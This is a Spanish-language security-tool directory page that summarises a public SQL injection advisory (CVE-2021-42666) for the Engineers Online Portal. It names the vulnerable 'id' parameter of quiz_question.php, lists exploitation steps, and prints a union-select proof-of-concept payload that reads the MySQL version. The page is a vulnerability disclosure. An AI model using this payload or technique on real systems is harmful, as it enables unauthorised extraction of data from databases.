Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-42666 — CVE-2021-42666 - vulnerabilidad de inyección SQL en el sistema de portal en línea de Engineers. | Kitploit
Herramientas/GitHubGitHub/0xdeku/cve-2021-42666
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónSeguridad de Bases de Datos
GitHub0xdeku/cve-2021-42666

CVE-2021-42666

CVE-2021-42666 - vulnerabilidad de inyección SQL en el sistema de portal en línea de Engineers.

Ver Repositorio
14hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-42666

CVE-2021-42666 - Vulnerabilidad de inyección SQL en el sistema de portal en línea de Engineers.

Descripción técnica:

Existe una vulnerabilidad de inyección SQL en el sistema Engineers Online Portal. Un atacante puede aprovechar el parámetro vulnerable "id" en la página web "quiz_question.php" para manipular la consulta SQL realizada. Como resultado, puede extraer datos sensibles del servidor web.

Componentes afectados -

Página vulnerable - quiz_question.php

Parámetro vulnerable - "id"

Pasos para explotar:

  1. Navegue a http://localhost/nia_munoz_monitoring_system/quiz_question.php
  2. Inserte su payload en el parámetro id

Prueba de concepto (PoC) -

El siguiente payload le permitirá extraer la versión del servidor MySql que se ejecuta en el servidor web -

root@kitploit:~
' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL;-- -

CVE-2021-42666

Referencias -

https://www.exploit-db.com/exploits/50453

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42666

https://nvd.nist.gov/vuln/detail/CVE-2021-42666

Descubierto por -

Alon Leviev(0xDeku), 22 de octubre de 2021.

Descargar herramienta